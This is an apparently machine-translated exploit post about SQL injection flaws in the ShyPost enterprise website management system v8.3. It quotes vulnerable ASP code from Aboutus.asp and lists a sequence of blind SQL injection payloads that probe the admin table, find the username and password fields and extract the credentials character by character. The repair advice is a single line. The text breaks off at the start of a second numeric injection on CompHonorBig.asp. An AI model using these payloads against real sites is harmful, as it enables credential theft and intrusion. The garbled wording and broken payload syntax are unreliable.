ShyPost enterprise website management system v8.3 injection and repair

For some needs, analyze the V8.3 version! Let's get started ~! ShyPost enterprise website management system v8.3 vulnerability 1: SQL Injection Aboutus. asp page <% Title = Trim (request ("Title") // request to obtain the title, just filtered out spaces. Set rs = Server. createObject ("ADODB. recordset ") // create an object SQL =" select Content from Aboutus where Title = '"& Title &"' "// The title is imported into the database to query rs. open SQL, conn,> specific use EXP: '+ and + '1' = '1 // determine whether the vulnerability exists' + and + exists (select + * + from + admin) + and + '1' = '1 // determine whether the admin table exists '+ and + esixts (select + username + from + admin) + and + '1' = '1 // determine whether the username Column exists '+ and + exists (select + password + from + admin) and + '1' = '1 // determine whether the password Column exists '+ and + (select + top + 1 + Len (username) + from + admin)> 4 + and + '1' = '1 // determine the length of the username field '+ and + (select + top + 1 + len (username) + from + admin) = 5 + and + '1' = '1 password is generally 16-bit MD5, so you can directly use the above sentence to determine if it is equal to 16, or equal to 32 '+ and + (select + top + 1 + + asc (mid (username,) from + admin) = 97 + and + '1' = '1 // determine the access code of the first letter of the account! Well, it's easy to use it ~! You can guess it yourself ~! It is recommended to fix: filter the 'symbol ~! Vulnerability 2: SQL Injection (numeric) CompHonorBig. asp page <! -# Include file = "Inc/conn. asp "-> <% dim idid = request. queryString ("id") %>